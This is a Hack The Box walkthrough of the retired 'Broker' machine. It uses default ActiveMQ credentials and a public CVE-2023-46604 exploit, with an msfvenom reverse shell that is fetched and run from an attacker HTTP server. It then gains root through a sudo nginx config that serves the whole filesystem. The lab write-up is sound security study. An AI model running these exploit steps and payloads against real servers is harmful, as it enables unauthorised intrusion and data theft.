
Broker

This is a retired Linux box from Hack The Box.

Date: 21 Dec 2023 (Thursday)

  1. Recon
  2. Shell as activemq
  3. Privilege escalation
nmap --min-rate 1000 -p- -Pn 10.129.230.87 -oN nmap_tcp.txt

Output:

[Screenshot: nmap scan results]

Several ports are open on the machine. Let's start with port 80.

[Screenshot: Apache ActiveMQ landing page on port 80]

Port 80 is the Apache ActiveMQ web console, so the next thing to find is the version.

Visiting the /admin endpoint prompts for HTTP basic auth. Trying ActiveMQ's default console credentials:

Username: admin
Password: admin

It worked.

[Screenshot: ActiveMQ console at /admin]

The console shows the ActiveMQ version: 5.15.15.

Searching for exploits against this version leads to CVE-2023-46604, unauthenticated remote code execution over the OpenWire protocol (TCP 61616 by default), fixed in 5.15.16. The broker unmarshals an ExceptionResponse frame by instantiating whatever class name the frame contains, passing a single String argument, without checking that the class is actually a Throwable. Public PoCs name Spring's ClassPathXmlApplicationContext and pass the URL of an attacker-hosted XML bean definition, which Spring loads and evaluates, running a command of the attacker's choice. I used this repo:

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

By following the repo's instructions we get a shell easily. First clone the tool, generate a reverse-shell ELF with msfvenom and host it (together with poc-linux.xml) over HTTP from the repo directory:

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git
cd CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server

Edit poc-linux.xml so that the command in its ProcessBuilder bean downloads test.elf from your HTTP server (http://{IP_Of_Hosted_XML_File}:8000/test.elf) and executes it. Start a listener on {Your_Listener_Port} (for example with nc -lvnp), then send the malicious OpenWire frame with the tool, pointing it at the hosted XML (8000 is python3 -m http.server's default port):

go run main.go -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8000/poc-linux.xml

The target fetches the XML, Spring instantiates the ProcessBuilder bean, and the reverse shell connects back as the activemq user.
Once the reverse shell is in, we are the activemq user. Check what sudo allows:

sudo -l

[Screenshot: sudo -l output]

activemq is allowed to run nginx as root, so we can start our own nginx instance with a config we control: one whose worker processes run as root and whose document root is /, giving read access to the whole filesystem over HTTP. Have a look at the existing config first, to see which ports are taken and what the include paths look like:

cat /etc/nginx/nginx.conf | grep -v "/#"
cat /etc/nginx/sites-enabled/default

Create the following nginx.conf on your own machine:

nano nginx.conf

user root;                  # workers run as root, so they can read any file
worker_processes auto;
pid /run/nginx2.pid;        # separate pid file, so the system nginx is untouched
include /etc/nginx/modules-enabled/*.conf;

events {
    worker_connections 768;
}

http {
    server {
        listen 1337;        # a port the real nginx is not already bound to
        location / {
            root /;         # serve the whole filesystem from /
        }
    }
}

Start a Python web server on your machine:

python -m http.server

On the target, download it into /dev/shm (world-writable tmpfs), where $RHOST is your own machine's IP:

wget -O /dev/shm/nginx.conf http://$RHOST:8000/nginx.conf

Start nginx as root with that config (adding -t to the same command tests the config without starting anything):

sudo nginx -c /dev/shm/nginx.conf

Download the flag. Because the config has no autoindex directive, directory listings return 403, so request files by their full path:

curl http://localhost:1337/root/root.txt